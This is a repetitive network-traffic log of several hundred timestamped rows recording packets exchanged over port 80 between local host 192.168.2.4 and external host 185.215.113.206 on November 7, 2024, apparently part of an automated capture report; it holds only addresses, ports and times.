Nov 7, 2024 04:12:19.987884045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.987891912 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.987895966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.987920046 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.987936974 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.987991095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988003969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988014936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988023043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988028049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988040924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988043070 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988054037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988059044 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988066912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988080978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988081932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988094091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988097906 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988122940 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988122940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988140106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988151073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988154888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988162041 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988164902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988182068 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988185883 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988198042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988209009 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988209009 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988230944 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988265991 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988317966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988328934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988339901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988352060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988363028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988363981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988373995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988374949 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988388062 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988399982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988400936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988410950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988419056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988426924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988439083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988454103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988461971 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988467932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988481045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988492012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988493919 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988512993 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988528013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988538980 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988538980 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988550901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988560915 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988564014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988575935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988584042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988589048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988596916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988632917 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988668919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988683939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988693953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988704920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988713026 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988715887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988728046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988739967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988740921 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988751888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988763094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988770008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988773108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988785982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988789082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988809109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988831043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988873005 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988884926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988894939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988905907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988908052 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988926888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988941908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.988956928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988967896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.988984108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989000082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989005089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989012957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989023924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989027023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989037037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989046097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989048004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989062071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989073992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989078999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989090919 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989108086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989119053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989130974 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989160061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989234924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989245892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989259958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989280939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989301920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989314079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989347935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989353895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989361048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989389896 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989398956 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989418030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989429951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989449978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989471912 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989489079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989528894 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989536047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989547968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989561081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989573002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989579916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989588022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989610910 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989645958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989658117 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989670038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989681005 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989685059 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989717007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989784002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989800930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989813089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989820004 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989825010 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989837885 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989854097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989869118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989882946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989886045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989898920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989905119 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989911079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989924908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989929914 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989936113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989943027 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989974976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.989984989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.989995956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990017891 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990047932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990088940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990099907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990111113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990123034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990123034 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990140915 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990151882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990168095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990180969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990184069 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990194082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990205050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990216017 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990216017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990250111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990253925 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990269899 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990298033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990310907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990323067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990333080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990339041 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990344048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990376949 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990396976 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990422964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990437984 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990441084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990459919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990461111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990472078 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990478039 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990490913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990499020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990503073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990508080 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990515947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990528107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990530014 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990537882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990544081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990544081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990551949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990557909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990603924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990639925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990677118 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990684032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990695953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990726948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990760088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990772009 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990789890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990801096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990818024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990838051 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990842104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990855932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990866899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990875006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990880013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990894079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990896940 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990904093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990911007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990940094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990947008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990952969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990977049 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.990979910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.990993023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991000891 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991009951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991014957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991023064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991034031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991038084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991060019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991086006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991089106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991101027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991131067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991149902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991209984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991240978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991254091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991266012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991293907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991328955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991339922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991349936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991363049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991370916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991374969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991388083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:19.991396904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:19.991424084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.031950951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.031963110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.031975031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.031987906 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032000065 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032026052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032042027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032072067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032083988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032088041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032107115 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032126904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032156944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032167912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032180071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032190084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032192945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032212973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032238007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032254934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032267094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032279015 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032290936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032298088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032303095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032308102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032336950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032342911 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032350063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032361984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032382011 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032391071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032407045 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032411098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032423973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032430887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032433987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032447100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032457113 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032459974 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032463074 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032470942 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032491922 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032500029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032511950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032521963 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032526970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032531023 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032540083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032547951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032553911 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032571077 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032584906 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032602072 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032835960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032879114 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032887936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032901049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032932997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032941103 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032948017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032959938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032972097 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.032980919 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.032984972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033000946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033024073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033081055 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033109903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033133030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033143997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033149958 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033157110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033171892 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033174038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033183098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033186913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033200979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.033202887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033221960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033246040 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.033263922 CET	80	49755	185.215.113.206	192.168.2.4
